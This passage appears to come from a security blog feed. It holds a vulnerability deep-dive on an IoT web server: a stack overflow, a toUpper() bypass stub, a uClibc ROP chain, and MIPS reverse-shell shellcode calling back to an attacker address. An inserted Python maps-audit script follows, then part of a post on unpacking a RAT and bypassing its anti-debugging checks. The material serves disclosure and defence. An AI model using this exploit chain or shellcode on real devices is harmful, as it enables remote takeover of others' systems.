        LOAD:00425CFC                 beq $v1, $v0, loc_425D14
        LOAD:00425D00                 li $v1, 0b101110
        LOAD:00425D04
        # loop backwards until a period is found, loading the character into $s0
        LOAD:00425D04 loc_425D04:
        LOAD:00425D04                 addiu $s0, -1
        LOAD:00425D08                 lbu $v0, 0($s0)
        LOAD:00425D0C                 bne $v0, $v1, loc_425D04
        LOAD:00425D10                 nop

    Under normal use there should always be an extension on the requested page, which prevents the vulnerable case from occurring. This can be seen in the GDB strings output below for the non-malicious page /web/dynaform/css_main.css, where the file extension ‘css’ will be parsed out.

        0x67a170:        "/web/dynaform/css_main.css"
        0x67a18b:        "46YWRtaW4="
        0x67a196:        "\nConnection: close\r\n\r\nWRtaW4=\r\nConnection: close\r\n\r\n6YWRtaW4=\r\nConnection: close\r\n\r\n46YWRtaW4=\r\nConnection: close\r\n\r\ntaW4=\r\nConnection: close\r\n\r\n http://192.168.0.1/\r\nAuthorization: Basic YWRtaW46YWRt"...
        0x67a25e:        "aW4=\r\nConnection: close\r\n\r\nnnection: close\r\n\r\n"
        0x67a28d:        ""
        0x67a28e:        ""
        0x67a28f:        ""
        0x67a290:        ""

    If, however, we request one of the vulnerable pages, we can see that the URI that gets parsed does not contain a period (0x2e). Because of this, the application will continue to search backwards until a period is reached. In this case, there is no period between the URI being parsed and the raw GET request data stored earlier on the heap (shown below at address 0x679960), allowing us to seek backwards into our payload.
    This can be seen at address 0x67a170 in the GDB strings output below for the malicious page /fs/help, where no file extension is being parsed.

        ...
        0x679960:        "/fs/help"
        0x679969:        "elp"
        0x67996d:        "HTTP/1.1"
        0x679976:        "\n"
        0x679978:        "ost: 192.168.0.1\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q"...
        0x679a40:        "=0.5\r\nAccept-Encoding: gzip, deflate\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n\r\n"
        0x679ac1:        ""
        0x679ac2:        ""
        0x679ac3:        ""
        0x679ac4:        ""
        0x679ac5:        ""
        ...
        0x67a165:        "gp"
        0x67a169:        ""
        0x67a16a:        "\b"
        0x67a16c:        ""
        0x67a16d:        ""
        0x67a16e:        ""
        0x67a16f:        ""
        0x67a170:        "/web/help"
        0x67a17a:        "secure-Requests"
        0x67a18a:        " 1"
        0x67a18d:        "\n\r\nure-Requests: 1\r\n\r\nclose\r\nUpgrade-Insecure-Requests: 1\r\n\r\nUpgrade-Insecure-Requests: 1\r\n\r\n\nUpgrade-Insecure-Requests: 1\r\n\r\nsic YWRtaW46YWRtaW4=\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n\r\na"...
        0x67a255:        "tion: Basic YWRtaW46YWRtaW4=\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n\r\nure-Requests: 1\r\n\r\n"
        0x67a2ba:        ""
        0x67a2bb:        ""
        0x67a2bc:        ""
        ...

    When a period is encountered, in either the expected file extension or the vulnerable case, the extracted string is processed by the toUpper() function, character by character, in the loop. The result of this operation is then written to a stack-based buffer by a store byte instruction.
    This can be seen in the instructions pulled from the aforementioned loop, shown below.

        #
        # loads parsed data onto stack via a store byte call from $s0 register
        #
        LOAD:00425D20 loc_425D20:
        LOAD:00425D20                 lbu $a0, 0($a0)
        # returns an uppercase version of the character where possible
        LOAD:00425D24                 jalr $t9 ; toUpper
        LOAD:00425D28                 nop
        # $gp references $s2, the place for the next char on the stack buffer
        LOAD:00425D2C                 lw $gp, 0x38+var_28($sp)
        # stores the character into $s2
        LOAD:00425D30                 sb $v0, 0($s2)
        LOAD:00425D34
        # calculates the length of the entire user-supplied string
        LOAD:00425D34 loc_425D34:
        LOAD:00425D34                 la $t9, strlen
        LOAD:00425D38                 jalr $t9 ; strlen
        # place a pointer to the parsed data into arg0
        LOAD:00425D3C                 move $a0, $s0
        LOAD:00425D40                 addiu $v1, $sp, 0x38+var_20
        LOAD:00425D44                 lw $gp, 0x38+var_28($sp)
        LOAD:00425D48                 sltu $v0, $s1, $v0
        LOAD:00425D4C                 addu $a0, $s0, $s1
        LOAD:00425D50                 addu $s2, $v1, $s1
        LOAD:00425D54                 la $t9, toupper

    The program continues execution until it reaches the httpGetMimeTypeByFileName function epilogue, where the return address and five registers are loaded from their saved values on the stack.
    When the vulnerability is being exploited, these saved values have been overwritten from their normal data to contain the addresses of the gadgets described later.

        #
        # registers get overwritten with saved values on the stack
        #
        LOAD:00425DB4 loc_425DB4:
        LOAD:00425DB4
        LOAD:00425DB4                 lw $ra, 0x38+var_4($sp)
        LOAD:00425DB8                 lw $s4, 0x38+var_8($sp)
        LOAD:00425DBC                 lw $s3, 0x38+var_C($sp)
        LOAD:00425DC0                 lw $s2, 0x38+var_10($sp)
        LOAD:00425DC4                 lw $s1, 0x38+var_14($sp)
        LOAD:00425DC8                 lw $s0, 0x38+var_18($sp)
        LOAD:00425DCC                 jr $ra
        LOAD:00425DD0                 addiu $sp, 0x38
        LOAD:00425DD0  # End of function httpGetMimeTypeByFileName

    At this point in the function epilogue, the loop copying data to a set buffer has overwritten the original data on the stack. By popping the data off of the stack that the program expects to be unmodified, the user gains control of the return address. This also means the user has the ability to remotely execute code in the context of the HTTPD process.

    toUpper() filter

    During the initial parsing of the HTTP header, the device iterates over each byte searching for a period (0x2e) and building a buffer. After a period is encountered, the buffer is passed to a toUpper() call, converting each ASCII character in the buffer to its uppercase equivalent.

        LOAD:00425D20 loc_425D20:
        LOAD:00425D20                 lbu $a0, 0($a0)
        # returns an upper case version of the character where possible
        LOAD:00425D24                 jalr $t9 ; toUpper
        LOAD:00425D28                 nop

    This creates a problem when attempting to send shellcode via the HTTP header, as there is no way to avoid the toUpper() call, preventing the use of any lowercase characters.
    Take the GET request below, for example.

        GET /fs/help HTTP/1.1
        Host: 192.168.0.1
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
        Content-Length: 2
        Accept-Encoding: gzip, deflate
        Authorization: Basic YWRtaW46YWRtaW4=
        Connection: keep-alive
        Upgrade-Insecure-Requests: 1
        Content-Length: 4

    We can see that the ‘a’ characters (0x61) in our header have been converted to their uppercase version (0x41) by looking at the registers just before the final jump in the httpGetMimeTypeByFileName function epilogue is executed.

        (gdb) i r
                  zero       at       v0       v1       a0       a1       a2       a3
         R0   00000000 10000400 00514004 00000035 7dfff821 0051432d 01010101 80808080
                    t0       t1       t2       t3       t4       t5       t6       t7
         R8   00000002 fffffffe 00000000 00000006 19999999 00000000 00000057 00425d2c
                    s0       s1       s2       s3       s4       s5       s6       s7
         R16  41414141 41414141 41414141 41414141 41414141 006798f4 006798d0 00000000
                    t8       t9       k0       k1       gp       sp       s8       ra
         R24  00000132 2ab02820 00000000 00000000 00598790 7dfff808 7dfffa62 41414141
                status       lo       hi badvaddr    cause       pc
              0000040c 00059cf8 000001fa 00590cac 00000024 00425dcc
        (gdb)

    What do we have here

    Additional examination of the registers shown above revealed that a pointer to a location predictably close to the original header data is left lying around after the toUpper() call. While broken on the final jump in the httpGetMimeTypeByFileName function epilogue, we can examine the data on the stack and find that a portion of our now uppercase header data, including the payload, is stored there.

        (gdb) x/32s $sp
        0x7dfff808:      ""
        0x7dfff809:      ""
        ...
        0x7dfff81f:      ""
        0x7dfff820:      "5\r\n", 'A' <repeats 197 times>...
        0x7dfff8e8:      'A' <repeats 200 times>...
        0x7dfff9b0:      'A' <repeats 200 times>...
        0x7dfffa78:      'A' <repeats 200 times>...
        0x7dfffb40:      'A' <repeats 143 times>, "\r\nCONTENT-LENGTH: 0\r\nACCEPT-ENCODING: GZIP, DEFLATE\r\nAUTH"...
        0x7dfffc08:      "ORIZATION: BASIC YWRTAW46YWRTAW4=\r\nCONNECTION: KEEP-ALIVE\r\nUPGRADE-INSECURE-REQUESTS: 1\r\nCONTENT-LENGTH: 0\r\n\r\n"
        0x7dfffc77:      ""
        0x7dfffc78:      ""
        0x7dfffc79:      ""
        ...
        (gdb)

    By contrast, if we examine the data following the location pointed to by register $s5, we see that the raw header data is still accessible.

        (gdb) x/32s $s5+0x64
        0x679958:        ""
        0x679959:        ""
        ...
        0x67995f:        ""
        0x679960:        "/fs/help"
        0x679969:        "elp"
        0x67996d:        "HTTP/1.1"
        0x679976:        "\n"
        0x679978:        "ost: 192.168.0.1\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q"...
        0x679a40:        "=0.5\r\n", 'a' <repeats 194 times>...
        0x679b08:        'a' <repeats 200 times>...
        0x679bd0:        'a' <repeats 200 times>...
        0x679c98:        'a' <repeats 200 times>...
        0x679d60:        'a' <repeats 146 times>, "\r\nContent-Length: 0\r\nAccept-Encoding: gzip, deflate\r\nA"...
        0x679e28:        "uthorization: Basic YWRtaW46YWRtaW4=\r\nConnection: keep-alive\r\nUpgrade-Insecure-Requests: 1\r\nContent-Length: 0\r\n\r\n"
        0x679e9a:        ""
        0x679e9b:        ""
        ...
        (gdb)

    Examining the permissions for that section of memory revealed that the range is executable, which initially suggested jumping directly to the raw header.

        # cat /proc/12518/maps
        00400000-00538000 r-xp 00000000 1f:02 69         /usr/bin/httpd
        00578000-00594000 rw-p 00138000 1f:02 69         /usr/bin/httpd
        00594000-006a6000 rwxp 00000000 00:00 0          [heap]
        2aaa8000-2aaad000 r-xp 00000000 1f:02 359        /lib/ld-uClibc-0.9.30.so
        2aaad000-2aaae000 rw-p 00000000 00:00 0
        2aaae000-2aab2000 rw-s 00000000 00:06 0          /SYSV0000002f (deleted)
        2aaec000-2aaed000 r--p 00004000 1f:02 359        /lib/ld-uClibc-0.9.30.so
        ...
        7f401000-7f600000 rwxp 00000000 00:00 0
        7fcf7000-7fd0c000 rwxp 00000000 00:00 0          [stack]

    This ended up not being a worthwhile path due to limitations introduced by toUpper() and an earlier strcmp(). The usage of toUpper() created a condition where any lowercase letter had to be considered a bad character. Additionally, since our data passes through a strcmp() call, we could not use any null bytes. These calls left us unable to use any of the following bytes: 0x00, 0x61-0x7a.

    Exploitation

    Bypassing toUpper()

    To get around the issue posed by toUpper(), we created a small piece of code calling memcpy() that does not use any lowercase characters or null bytes, to execute after gaining control of $ra.
    With this code, we were able to copy the header data onto the stack in its original form and jump to it for execution.

        move    $a0, $t9         # put the stack pointer into arg1
        addiu   $a0, 0x12C       # increase arg1 so we don't overwrite this code
        addiu   $a1, $s5, 0x198  # load the raw header data pointer into arg2
        li      $a2, 0x374       # load the size into arg3
        li      $t9, 0x2AB01E20  # load $t9 with the address of memcpy()
        jalr    $t9              # call memcpy()
        move    $t8, $t3         # placeholder to handle delay slot without nulls
        move    $t9, $sp         # prep $t9 with the stack pointer
        addiu   $t9, 0x14C       # increase the $t9 pointer to the raw header
        jalr    $t9              # execute the raw header on the stack
        move    $t8, $t3         # placeholder to handle delay slot without nulls

    Before we could use this technique, we needed to find a way to gain execution of our memcpy() code. On this device we are fortunate to have an executable stack; however, we did not know where our code would end up. We ended up using a modified ret2libc technique, allowing us to leverage gadgets from uClibc to obtain a pointer to the stack and set up registers for our code.

    Our first gadget, located at the uClibc offset address of 0x0002fc84, was used to increment the stack pointer by 0x20 to get past any of the memcpy shellcode. To ensure that control of the program execution was retained after this gadget returned, we placed the address of our second gadget at the location 0x20+$sp as required below.

        LOAD:0002FC84                 lw $ra, 0x20+var_8($sp)
        LOAD:0002FC88                 jr $ra
        LOAD:0002FC8C                 addiu $sp, 0x20

    The second gadget, located at the uClibc offset address of 0x000155b0, was used to obtain a pointer to the incremented stack buffer. This placed the desired pointer into register $a1.
    We placed the address of our third gadget at the location 0x58+$sp as required below to ensure that control of the program execution was retained after this gadget returned.

        LOAD:000155B0                 addiu $a1, $sp, 0x58+var_40
        LOAD:000155B4                 lw $gp, 0x58+var_48($sp)
        LOAD:000155B8                 sltiu $v0, 1
        LOAD:000155BC                 lw $ra, 0x58+var_8($sp)
        LOAD:000155C0                 jr $ra
        LOAD:000155C4                 addiu $sp, 0x58

    Finally, a gadget located at the uClibc offset address of 0x000172fc was used to jump into the stack buffer.

        LOAD:000172FC                 move $t9, $a1
        LOAD:00017300                 move $a1, $a2
        LOAD:00017304                 sw $v0, 0x4C($a0)
        LOAD:00017308                 jr $t9
        LOAD:0001730C                 addiu $a0, 0x4C # 'L'

    We needed to obtain uClibc's load address so that we could calculate each gadget's true location and use these gadgets successfully. Looking at the process memory map below, we can see that the executable version of uClibc is loaded at the address 0x2aaee000.

        # cat /proc/12518/maps
        00400000-00538000 r-xp 00000000 1f:02 69         /usr/bin/httpd
        00578000-00594000 rw-p 00138000 1f:02 69         /usr/bin/httpd
        00594000-006a6000 rwxp 00000000 00:00 0          [heap]
        2aaa8000-2aaad000 r-xp 00000000 1f:02 359        /lib/ld-uClibc-0.9.30.so
        2aaad000-2aaae000 rw-p 00000000 00:00 0
        2aaae000-2aab2000 rw-s 00000000 00:06 0          /SYSV0000002f (deleted)
        2aaec000-2aaed000 r--p 00004000 1f:02 359        /lib/ld-uClibc-0.9.30.so
        2aaed000-2aaee000 rw-p 00005000 1f:02 359        /lib/ld-uClibc-0.9.30.so
        2aaee000-2ab21000 r-xp 00000000 1f:02 363        /lib/libuClibc-0.9.30.so
        2ab21000-2ab61000 ---p 00000000 00:00 0
        2ab61000-2ab62000 rw-p 00033000 1f:02 363        /lib/libuClibc-0.9.30.so
        2ab62000-2ab66000 rw-p 00000000 00:00 0
        2ab66000-2ab68000 r-xp 00000000 1f:02 349        /lib/librt-0.9.30.so
        2ab68000-2aba7000 ---p 00000000 00:00 0
        ...
        7f001000-7f200000 rwxp 00000000 00:00 0
        7f200000-7f201000 ---p 00000000 00:00 0
        7f201000-7f400000 rwxp 00000000 00:00 0
        7f400000-7f401000 ---p 00000000 00:00 0
        7f401000-7f600000 rwxp 00000000 00:00 0
        7fcf7000-7fd0c000 rwxp 00000000 00:00 0          [stack]

    By taking the load address of uClibc and adding it to the offset address obtained for each of the gadgets, we can get the usable address of the desired code. These addresses can then be strategically placed, causing the execution of our initial code and, subsequently, our payload.

    LexraMIPS shellcode

    While LexraMIPS is based on the MIPS specification, it does deviate enough to cause inconsistencies when attempting to execute some standard MIPS instructions. Because of this, we chose to develop shellcode specifically for LexraMIPS, using a GCC toolchain found here. The code below takes the approach of creating a connection back to the attacker, duplicating stdin, stdout, and stderr into the socket file descriptor, and finally spawning a shell.

    We start by opening a socket on the device, leveraging a nor technique to avoid any null bytes in our $t7 register. It should be noted that the MIPS $zero register does not introduce any null bytes when used.

        li $t7, -6           # set up $t7 with the value 0xfffffffa
        nor $t7, $t7, $zero  # nor $t7 with zero to get the value 0x05 w/o nulls
        addi $a0, $t7, -3    # $a0 must hold family (AF_INET - 0x02)
        addi $a1, $t7, -3    # $a1 must hold type (SOCK_STREAM - 0x02)
        slti $a2, $zero, -1  # $a2 must hold protocol (essentially unset - 0x00)
        li $v0, 4183         # sets the desired syscall to 'socket'
        syscall 0x40404      # triggers a syscall, removing null bytes

    With a socket opened, we use a connect syscall to create a TCP connection from the device to the attacker. Null bytes were a particular issue in this step, as the default subnet for this device contained a zero.
    To avoid this issue, we leverage a technique that forces our prepped register values to overflow and result in the desired IP address without using null bytes.

        sw $v0, -36($sp)     # puts the returned socket reference onto the stack
        lw $a0, -36($sp)     # $a0 must hold the file descriptor - pulled from the stack
        sw $a1, -32($sp)     # place socket type (SOCK_STREAM - 0x02) onto the stack
        lui $t7, 8888        # prep the upper half of $t7 register with the port number
        ori $t7, $t7, 8888   # or the $t7 register with the desired port number
        sw $t7, -28($sp)     # place the port onto the stack
        lui $t7, 0xc0a7      # put the first half of the ip addr into $t7 (192.166)
        ori $t7, 0xff63      # put the second half of the ip addr into $t7 (255.99)
        addiu $t7, 0x101     # fix the ip addr (192.166.255.99 -> 192.168.0.100)
        sw $t7, -26($sp)     # put the ip address onto the stack
        addiu $a1, $sp, -30  # put a pointer to the sockaddr struct into $a1
        li $t7, -17          # load 0xffef into $t7 for later processing
        nor $a2, $t7, $zero  # $a2 must hold the address length - 0x10
        li $v0, 4170         # sets the desired syscall to 'connect'
        syscall 0x40404      # triggers a syscall, removing null bytes

    To ensure that the device accepted our input and properly displayed any output, it is necessary to duplicate the stdin, stdout, and stderr file descriptors.
    By duplicating each of these I/O file descriptors into our socket, we are able to successfully provide input to the device and view any output via the recently set up connection.

        lw $t7, -32($sp)     # load $t7 for later file descriptor processing
        lw $a0, -36($sp)     # put the socket fd into $a0
        lw $a1, -32($sp)     # put the stderr fd into $a1
        li $v0, 4063         # sets the desired syscall to 'dup2'
        syscall 0x40404      # triggers a syscall, removing null bytes
        lw $t7, -32($sp)     # load $t7 for later file descriptor processing
        lw $a0, -36($sp)     # put the socket fd into $a0
        addi $a1, $t7, -1    # put the stdout fd into $a1
        li $v0, 4063         # sets the desired syscall to 'dup2'
        syscall 0x40404      # triggers a syscall, removing null bytes
        lw $t7, -32($sp)     # load $t7 for later file descriptor processing
        lw $a0, -36($sp)     # put the socket fd into $a0
        addi $a1, $t7, -2    # put the stdin fd into $a1
        li $v0, 4063         # sets the desired syscall to 'dup2'
        syscall 0x40404      # triggers a syscall, removing null bytes

    Finally, we use an execve system call to spawn a shell locally on the device.
    Since this shell is spawned from our socket, and we already have control over stdin/stdout/stderr, we can control the new shell remotely through our connection.

        lui $t7, 0x2f2f      # start building the command string    -> //
        ori $t7, $t7, 0x6269 # continue building the command string -> bi
        sw $t7, -20($sp)     # put the string so far onto the stack
        lui $t7, 0x6e2f      # continue building the command string -> n/
        ori $t7, $t7, 0x7368 # continue building the command string -> sh
        sw $t7, -16($sp)     # put the next portion of the string onto the stack
        sw $zero, -12($sp)   # null terminate the command string
        addiu $a0, $sp, -20  # place a pointer to the command string into arg 1
        sw $a0, -8($sp)      # place a pointer to the command string array onto the stack
        sw $zero, -4($sp)    # null terminate the array
        addiu $a1, $sp, -8   # load the pointer to our command string array into arg 2
        slti $a2, $zero, -1  # sets $a2 to 0
        li $v0, 4011         # sets the desired syscall to 'execve'
        syscall 0x40404      # triggers a syscall, removing null bytes

    With a functional shell on the device, we can continue with our post-exploitation analysis of the device.

    Conclusion

    Unfortunately, these types of vulnerabilities are all too common in IoT devices. Attackers can find these issues and weaponize them to execute code on vulnerable devices. It is imperative that everyone realizes that IoT devices are computers, and like all computers, the software must be maintained to ensure the device is as secure as possible.

    Talos will continue to discover and responsibly disclose vulnerabilities, working with vendors to ensure that customers are protected and providing additional deep-dive analysis when necessary. Finding and disclosing zero-day vulnerabilities via coordinated disclosure helps improve the overall security of the devices and software people use on a day-to-day basis. Talos is committed to this effort, developing programmatic ways to identify problems or flaws that could otherwise be exploited by malicious attackers.

    For vulnerabilities Talos has disclosed, please refer to our vulnerability report portal. You can also review our vulnerability disclosure policy here. […]
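    The two /proc/12518/maps listings in the post above are what made the approach workable: the heap, several anonymous regions and the stack are all mapped rwxp, and the r-xp mapping of libuClibc gives the base address for the gadget arithmetic. The following Python is an added example, not code from the Talos post: it parses a maps listing (the sample below is copied from the post's second listing), reports every mapping that is both writable and executable, so a firmware or process audit can flag a missing NX / non-executable-stack configuration, and returns a shared library's load address the same way the post derives 0x2aaee000. The function names are this example's own.

```python
"""Audit a /proc/<pid>/maps listing for W+X mappings and library load bases.

Added example, not code from the Talos post.  SAMPLE_MAPS is copied from
the post's own `cat /proc/12518/maps` output; the function names
(parse_maps, find_wx, library_base, summarize) are this example's own.
"""
import re
from typing import Dict, List, Optional

# One mapping per line: start-end perms offset dev inode [path]
_MAPS_RE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>[rwxps-]{4})\s+"
    r"(?P<offset>[0-9a-f]+)\s+(?P<dev>[0-9a-f]+:[0-9a-f]+)\s+(?P<inode>\d+)"
    r"(?:\s+(?P<path>\S.*))?$"
)

SAMPLE_MAPS = """\
00400000-00538000 r-xp 00000000 1f:02 69         /usr/bin/httpd
00578000-00594000 rw-p 00138000 1f:02 69         /usr/bin/httpd
00594000-006a6000 rwxp 00000000 00:00 0          [heap]
2aaa8000-2aaad000 r-xp 00000000 1f:02 359        /lib/ld-uClibc-0.9.30.so
2aaad000-2aaae000 rw-p 00000000 00:00 0
2aaae000-2aab2000 rw-s 00000000 00:06 0          /SYSV0000002f (deleted)
2aaec000-2aaed000 r--p 00004000 1f:02 359        /lib/ld-uClibc-0.9.30.so
2aaed000-2aaee000 rw-p 00005000 1f:02 359        /lib/ld-uClibc-0.9.30.so
2aaee000-2ab21000 r-xp 00000000 1f:02 363        /lib/libuClibc-0.9.30.so
2ab21000-2ab61000 ---p 00000000 00:00 0
2ab61000-2ab62000 rw-p 00033000 1f:02 363        /lib/libuClibc-0.9.30.so
2ab62000-2ab66000 rw-p 00000000 00:00 0
2ab66000-2ab68000 r-xp 00000000 1f:02 349        /lib/librt-0.9.30.so
2ab68000-2aba7000 ---p 00000000 00:00 0
7f001000-7f200000 rwxp 00000000 00:00 0
7f200000-7f201000 ---p 00000000 00:00 0
7f201000-7f400000 rwxp 00000000 00:00 0
7f400000-7f401000 ---p 00000000 00:00 0
7f401000-7f600000 rwxp 00000000 00:00 0
7fcf7000-7fd0c000 rwxp 00000000 00:00 0          [stack]
"""


def parse_maps(text: str) -> List[Dict]:
    """Parse maps text into dicts; skips blank lines, '#' prompts and '...' elisions."""
    mappings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line == "...":
            continue
        m = _MAPS_RE.match(line)
        if not m:
            raise ValueError("unparseable maps line: %r" % line)
        d = m.groupdict()
        mappings.append({
            "start": int(d["start"], 16),
            "end": int(d["end"], 16),
            "perms": d["perms"],
            "path": d["path"] or "",
        })
    return mappings


def find_wx(text: str) -> List[Dict]:
    """Mappings that are both writable and executable.  Any such region lets
    attacker-controlled data (a stack buffer, a heap block) run as code once
    control flow is hijacked; a hardened build should report none."""
    return [m for m in parse_maps(text) if "w" in m["perms"] and "x" in m["perms"]]


def library_base(text: str, name: str) -> Optional[int]:
    """Lowest start address of any mapping whose path ends in `name`:
    the library's load address, the base the post adds gadget offsets to."""
    addrs = [m["start"] for m in parse_maps(text) if m["path"].endswith(name)]
    return min(addrs) if addrs else None


def summarize(text: str) -> Dict:
    """Audit summary: how many W+X regions exist and what backs them."""
    wx = find_wx(text)
    return {"wx_count": len(wx),
            "wx_regions": [m["path"] or "[anon]" for m in wx]}


if __name__ == "__main__":
    print(summarize(SAMPLE_MAPS))
    print(hex(library_base(SAMPLE_MAPS, "libuClibc-0.9.30.so")))
```

    On this listing the audit reports five W+X regions (heap, three anonymous regions and the stack), which is the finding a defender would want before shipping: with NX-enforced mappings the copied header could not have been executed in place.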

  • What we learned by unpacking a recent wave of Imminent RAT infections using AMP
    by noreply@blogger.com (Jaeson Schultz) on January 17, 2019 at 10:08 pm

    This blog post was authored by Chris Marczewski.

    Cisco Talos has been tracking a series of Imminent RAT infections for the past two months following reported data from Cisco Advanced Malware Protection’s (AMP) Exploit Prevention engine. AMP successfully stopped the malware before it was able to infect the host, but an initial analysis showed a strong indication that stages exist before the deployment of the RAT. Surprisingly, the recovered samples showed no sign of Imminent RAT, but instead a commercial-grade packer.

    This was a series of attacks engineered to evade detection and frustrate analysis. From the outside, we have a commercially available, yet affordable packer called “Obsidium” that has been used in the past to protect the intellectual property of some legitimate software vendors. The payload results in a RAT called Imminent that has also been used previously for legitimate purposes. Imminent is a commercially available RAT that retails for $25 to $100, depending upon the size of the customer’s expected user base. While it is not intended for malicious use, in this case, its detection suggested otherwise.

    Although a Potentially Unwanted Application (PUA) detection approach could suffice, not everyone enables blocking of PUAs. We have other technologies in place, such as the Exploit Prevention engine, that are well-suited to detect such threats. We hope that after reading this research, you’ll have a better understanding of not only what it takes to investigate an attack using a complex packer, but also how AMP is equipped to stop such attacks that planned on successfully evading static detection or thwarting the benefits of dynamic analysis from a malware sandbox.

    After AMP detected this particular strain of Imminent, and when we saw how complex the packer was that’s used to hide the malware from detection, we decided to investigate further.
    The following dynamic run shows this:

    We identified the use of a commercial-grade packer, but we were also curious about the extent of the anti-debugging and anti-virtual machine techniques employed by this particular run of the packer. It starts with several instances of overriding SEH exception handlers. This is accomplished by pushing one handler before and after FS:0, then moving the stack pointer to FS:0. This is possible since the sample is 32-bit and was not compiled with SafeSEH. Intentional access violations and illegal instructions redirect to some preparation code, leading to the initial decryption of malicious code.

    Since the overrides lead to mostly preparation code, most of this can be skipped by following where all user-land exceptions must go: ntdll->KiUserExceptionDispatcher. You can pass the exception to the application and break just before the jump condition to determine whether another exception exists in the chain, or whether runtime can continue.

    Finally, follow the pointer stored at ECX to resolve a CONTEXT structure and determine the EIP for the instruction that will be executed upon calling NtContinue. EIP can be manually resolved by following ECX at this point during runtime and applying the CONTEXT structure for a 32-bit context.

    The malware decrypts and re-encrypts sections of malicious code one at a time, making it hard to determine a complete timeline for a full decryption point without manually stepping through each section. The cryptographic scheme uses AES per native x86 instructions and wrapper functions.

    Past the initial code decryption, you start to see some semblance of complex API resolving, the first of which resembles other portions of the binary, but deters analysis overall: junk byte insertion for anti-disassembly.

    As one might expect, this makes modern disassembler rendering of control flow graphs and function blocks quite messy.
    Several breakpoints and call returns later, you start to notice API strings getting tossed around the general purpose registers. With some trial and error, it’s not impossible to break on the pivotal return points where the resolved API address is stored in EAX. You can then run the debugger until a call return, but you will encounter some additional access violations and illegal instructions acting as code trampolines, as shown below. The access violations and illegal instructions are a standard feature of the packer if the end user decides to include anti-debugging when running the payload through the packer.

    It’s also worth mentioning that resolved API addresses should not be broken on, nor jumped to by running until you hit call returns. Call returns are not always used by the packer to move to the desired API. Also, the address of the API is not used directly but is instead invoked a few instructions within the function, and the depth varies for each API. Your best course of action is to break a few calls into the API code, early enough to view the original parameters that were haphazardly passed to the resolved API. What’s more, the packer code will check the target of the trampoline within the API code for software breakpoints (0xCC, or int 3 when disassembled) prior to redirection.

    After you’ve established such control over the debugging session, you can begin to handle the anti-debugging checks. This is a necessary step to unpack the original payload successfully. Conventional techniques of letting a sample run and dumping full images or relevant sections of code are not possible in this case due to such checks. With this packer, the anti-debugging checks include the following:

      • Class registration, passed to CreateWindowEx, containing a callback parameter to be called by CallWindowProc. The callback function itself invokes NtQueryInformationProcess with ProcessDebugPort set as the requested ProcessInformationClass enumeration.
      • The API is called again twice for the undocumented ProcessInformationClass enumerations ProcessDebugObjectHandle and ProcessDebugFlags.
      • NtQuerySystemInformation is called with an undocumented enumeration of the SystemInformationClass parameter: SystemKernelDebuggerInformation. In this particular case, the standard SYSTEM_BASIC_INFORMATION structure is not returned, but instead a SYSTEM_KERNEL_DEBUGGER_INFORMATION structure is returned, containing UCHAR KernelDebuggerEnabled and UCHAR KernelDebuggerNotPresent. The user can bypass this debugger check by toggling the flags appropriately.
      • CloseHandle is called for an invalid handle. When debugging a process, this will generate an exception rather than resulting in a silent failure of the API. In this case, the exception leads back to the debugger being detected (EnumWindows->MessageBoxA->“Debugger detected…”). Discard the exception when debugging to bypass this check.
      • CreateFileA is called several times to check if file objects with the following debugger-related file names can be instantiated on the host: \\.\SICE, \\.\NTICE, \\.\NTFIRE
